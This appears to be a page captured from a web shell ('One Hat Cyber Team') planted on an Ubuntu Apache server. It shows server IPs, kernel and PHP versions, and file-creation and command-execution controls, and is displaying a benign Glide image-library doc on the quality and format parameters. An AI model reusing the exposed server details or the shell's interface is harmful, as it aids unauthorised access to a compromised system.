⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.5
Server IP:
13.127.59.50
Server:
Linux ip-172-31-46-210 5.15.0-1033-aws #37~20.04.1-Ubuntu SMP Fri Mar 17 11:39:30 UTC 2023 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
ubuntu
/
vendor
/
league
/
glide
/
docs
/
1.0
/
api
/
View File Name :
encode.md
--- layout: default title: Encode --- # Encode ## Quality `q` Defines the quality of the image. Use values between `0` and `100`. Defaults to `90`. Only relevant if the format is set to `jpg`. ~~~ html <img src="kayaks.jpg?w=500&q=25"> ~~~ [](https://glide.herokuapp.com/1.0/kayaks.jpg?w=500&q=25) ## Format `fm` Encodes the image to a specific format. Accepts `jpg`, `pjpg` (progressive jpeg), `png` or `gif`. Defaults to `jpg`. ~~~ html <img src="kayaks.jpg?w=500&fm=gif"> ~~~ [](https://glide.herokuapp.com/1.0/kayaks.jpg?w=500&fm=gif)